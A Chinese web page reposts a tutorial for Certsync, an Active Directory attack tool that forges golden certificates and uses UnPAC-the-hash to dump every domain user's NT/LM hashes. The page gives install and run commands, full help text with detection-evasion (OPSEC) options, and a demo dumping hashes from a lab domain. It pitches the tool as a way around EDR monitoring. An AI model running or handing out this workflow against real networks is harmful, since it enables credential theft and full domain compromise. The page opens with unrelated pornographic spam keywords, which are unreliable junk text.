日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用Certsync遠程轉(zhuǎn)儲NTDS黃金證書和UnPAC哈希

關(guān)于Certsync

Certsync是一種使用黃金證書和UnPAC哈希值來遠程轉(zhuǎn)儲NTDS的新技術(shù)。在該工具的幫助下,廣大研究人員能夠輕松獲取目標域控制器中的用戶列表、CA信息和CRL,并轉(zhuǎn)儲CA證書和私鑰。值得一提的是,在整個業(yè)務流程中,該工具不需要使用到DRSUAPI。除此之外,該工具的運行速度也非常的快,效率非常高。

工具功能

1、從 LDAP 轉(zhuǎn)儲用戶列表、CA 信息和 CRL;

2、轉(zhuǎn)儲 CA 證書和私鑰;

3、為每個用戶離線偽造證書;

4、UnPAC 每個用戶的哈希以獲得 nt 和 lm 哈希;

為什么需要Certsync?

由于DSRUAPI(Domain Services Remote Protocol API)越來越受到EDR解決方案的監(jiān)控和限制,而Certsync則提供了一種繞過這些限制的新方法。與使用DSRUAPI不同,Certsync不需要域管理員權(quán)限,只需要CA管理員權(quán)限。

工具運行要求

1、在域中有配置企業(yè)CA的ADCS(Active Directory Certificate Services)服務器;

2、PKINIT正常工作;

3、AD中有本地管理員域帳戶或?qū)С鯟A證書和私鑰;

工具安裝

由于該工具基于Python開發(fā),因此我們首先需要在本地設備上安裝并配置好Python環(huán)境。

接下來,廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/zblurx/certsync

cd certsync

pip install .

或者直接使用pip安裝:

pip install certsync

工具使用

廣大研究人員可以通過下列方法直接運行Certsync:

certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12

上述命令將會連接到LDAP服務器,收集用戶列表、CA信息和CRL。然后,它會找到CA證書和私鑰,并為每個用戶生成偽造證書。最后,它會使用UnPAC算法獲取用戶的nt和lm哈希值。

工具幫助信息

可以使用-h參數(shù)查看所有可用選項和用法示例:

$ certsync -h

usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]

                [-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]

                [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

 

Dump NTDS with golden certificates and PKINIT

 

options:

  -h, --help            show this help message and exit

  -debug                Turn DEBUG output ON

  -outputfile OUTPUTFILE

                        base output filename

 

CA options:

  -ca-pfx pfx/p12 file name

                        Path to CA certificate

  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

 

authentication options:

  -d domain.local, -domain domain.local

                        Domain name

  -u username, -username username

                        Username

  -p password, -password password

                        Password

  -hashes LMHASH:NTHASH

                        NTLM hashes, format is LMHASH:NTHASH

  -no-pass              don't ask for password (useful for -k)

  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it

                        will use the ones specified in the command line

  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

  -use-kcache           Use Kerberos authentication from ccache file (KRB5CCNAME)

  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

 

connection options:

  -scheme ldap scheme

  -ns nameserver        Nameserver for DNS resolution

  -dns-tcp              Use TCP instead of UDP for DNS queries

  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

 

OPSEC options:

  -ldap-filter LDAP_FILTER

                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))

  -template cert.pfx    base template to use in order to forge certificates

  -timeout timeout      Timeout between PKINIT connection

  -jitter jitter        Jitter between PKINIT connection

  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

OPSEC選項

Certsync提供了一些OPSEC選項,可以自定義工具的行為:

-ldap-filter:更改用于選擇用戶名的LDAP過濾器;

-template:在偽造用戶證書時使用指定的證書模板;

-timeout和-jitter:調(diào)整PKINIT連接之間的超時和間隔時間;

-randomize:隨機化證書生成過程,使每個偽造的用戶證書具有不同的私鑰、序列號和有效期,但會增加生成時間;

使用這些選項可以根據(jù)廣大研究人員的功能需求自定義Certsync工具的功能。

工具運行演示

$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12

[*] Collecting userlist, CA info and CRL on LDAP

[*] Found 13 users in LDAP

[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)

[*] Dumping CA certificate and private key

[*] Forging certificates for every users. This can take some time...

[*] PKINIT + UnPAC the hashes

ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::

ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::

ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::

ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::

ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::

ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::

ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::

ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::

ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

許可證協(xié)議

本項目的開發(fā)與發(fā)布遵循MIT開源許可證協(xié)議。

項目地址

Certsync:【GitHub傳送門】

參考資料

https://cyberstoph.org/posts/2019/12/an-introduction-to-golden-certificates/

https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash


網(wǎng)頁標題:如何使用Certsync遠程轉(zhuǎn)儲NTDS黃金證書和UnPAC哈希
文章源于:http://m.5511xx.com/article/ccdpedo.html